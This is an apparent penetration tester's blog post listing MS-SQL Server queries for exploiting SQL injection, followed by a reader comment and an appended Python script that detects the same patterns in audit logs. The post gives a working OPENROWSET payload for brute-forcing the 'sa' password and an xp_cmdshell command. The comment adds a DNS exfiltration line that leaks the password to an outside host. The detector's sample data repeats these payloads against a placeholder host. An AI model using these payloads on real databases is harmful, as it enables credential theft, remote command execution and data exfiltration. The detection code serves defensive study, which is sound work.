www.notsosecure.com

From Pentesters To Pentesters

Some information about MS-SQL Server that you may find useful when exploiting SQL injection:

Finding Table Names:
Do not use: Select name from sysobjects where xtype='U'
Use: SELECT table_name FROM INFORMATION_SCHEMA.TABLES
[WHERE table_schema = 'db_name']
[WHERE|AND table_name LIKE 'wild']
The first query only returns the table names that belong to the current database, whereas the second query also returns table names from any other database to which the current user has access.

Getting Current User:
Use: Select SYSTEM_USER
Someone pointed out that Select user returns the owner of the current database, which may differ from the current user. So SYSTEM_USER is always the correct one to use.

Brute Forcing 'sa' User's Password:
Use openrowset: select null from openrowset('sqloledb','';'sa';'[password]','select 1;waitfor delay ''0:0:10''')

When the password supplied is correct, the query 'select 1;waitfor delay ''0:0:10''' will get executed. As I write this blog, I am just wondering if we can execute something like this:

select null from openrowset('sqloledb','';'sa';'[password]','exec master..xp_cmdshell ''ping my_host'''). I will confirm this sometime later.

One Comment

  1. Quoting:

    select null from openrowset('sqloledb','';'sa';'[password]','exec
    master..xp_cmdshell ''ping my_host'''). I will confirm this sometime later.

    I thought of a possible refinement to your idea. Maybe you could get
    the query to send a DNS request containing the password.

    Instead of:

    exec master..xp_cmdshell 'ping myhost'

    Do:

    exec master..xp_cmdshell 'ping [password].notsosecure.com'

    Listen for the DNS request on your nameserver. Outbound ping might be
    blocked, but outbound DNS is less likely to be blocked.

    Ref: http://pentestmonkey.net/blog/mssql-dns/

    Just a thought.
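A detection-side counterpart to the two techniques discussed above (the post's OPENROWSET password-guessing loop with WAITFOR DELAY as the success signal, and the comment's xp_cmdshell DNS beacon), written as an added example and not code from the post or its commenter: it scans statement text of the kind a SQL Server audit or Extended Events session exports, flags OPENROWSET calls that carry inline credentials, WAITFOR DELAY and xp_cmdshell, and counts the distinct passwords tried per login so that a guessing burst stands out. The sample statements, the login and password guesses and the hostname are constructed placeholders; scan, scan_statement and credential_guess_bursts are names chosen for this example.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: statement text in the shape a SQL Server audit or
# Extended Events export would give, mirroring the patterns in the post and
# the comment. Logins, passwords and the hostname are placeholders.
SAMPLE_STATEMENTS = [
    "SELECT table_name FROM INFORMATION_SCHEMA.TABLES",
    "SELECT SYSTEM_USER",
    "select null from openrowset('sqloledb','';'sa';'guess1','select 1;waitfor delay ''0:0:10''')",
    "select null from openrowset('sqloledb','';'sa';'guess2','select 1;waitfor delay ''0:0:10''')",
    "select null from openrowset('sqloledb','';'sa';'guess3','select 1;waitfor delay ''0:0:10''')",
    "select null from openrowset('sqloledb','';'sa';'guess4','exec master..xp_cmdshell ''ping guess4.dns-listener.example''')",
    "SELECT id, name FROM products WHERE category = @cat",
]

# OPENROWSET whose provider string embeds a login and password:
#   openrowset('<provider>', '<datasource>';'<login>';'<password>', '<query>')
OPENROWSET_CREDS = re.compile(
    r"openrowset\s*\(\s*'[^']*'\s*,\s*'[^']*'\s*;\s*'(?P<login>[^']*)'\s*;\s*'(?P<password>[^']*)'",
    re.IGNORECASE,
)
WAITFOR_DELAY = re.compile(r"\bwaitfor\s+delay\b", re.IGNORECASE)
XP_CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    index: int    # position of the statement in the input
    rule: str     # name of the rule that fired
    detail: str   # short context for the analyst


def scan_statement(index: int, statement: str) -> list[Finding]:
    """Apply the per-statement rules to a single statement."""
    findings: list[Finding] = []
    m = OPENROWSET_CREDS.search(statement)
    if m:
        findings.append(Finding(index, "openrowset_inline_credentials",
                                f"login={m.group('login')!r}"))
    if WAITFOR_DELAY.search(statement):
        findings.append(Finding(index, "waitfor_delay", "time-based probe"))
    if XP_CMDSHELL.search(statement):
        findings.append(Finding(index, "xp_cmdshell", "OS command execution"))
    return findings


def credential_guess_bursts(statements, threshold: int = 3) -> dict[str, int]:
    """Count distinct passwords tried per login through OPENROWSET.

    A login that reaches the threshold looks like an online guessing attempt
    rather than a one-off linked-server style query."""
    tried: dict[str, set[str]] = defaultdict(set)
    for s in statements:
        m = OPENROWSET_CREDS.search(s)
        if m:
            tried[m.group("login").lower()].add(m.group("password"))
    return {login: len(pws) for login, pws in tried.items() if len(pws) >= threshold}


def scan(statements, threshold: int = 3):
    """Run every statement through the rules and summarise guessing bursts."""
    findings = [f for i, s in enumerate(statements) for f in scan_statement(i, s)]
    return findings, credential_guess_bursts(statements, threshold)


if __name__ == "__main__":
    findings, bursts = scan(SAMPLE_STATEMENTS)
    for f in findings:
        print(f"[{f.rule}] statement #{f.index}: {f.detail}")
    for login, n in bursts.items():
        print(f"[credential_guessing] {n} distinct passwords tried for login {login!r}")
```

Run it as a script to see the findings for the built-in sample; for a real export, map the statement-text column into the list passed to scan. The OPENROWSET form only executes when the instance has the Ad Hoc Distributed Queries option enabled, and the xp_cmdshell form only when that procedure is enabled, so on an instance with both switched off the statements fail but still land in the audit trail, which is exactly where rules like these catch them.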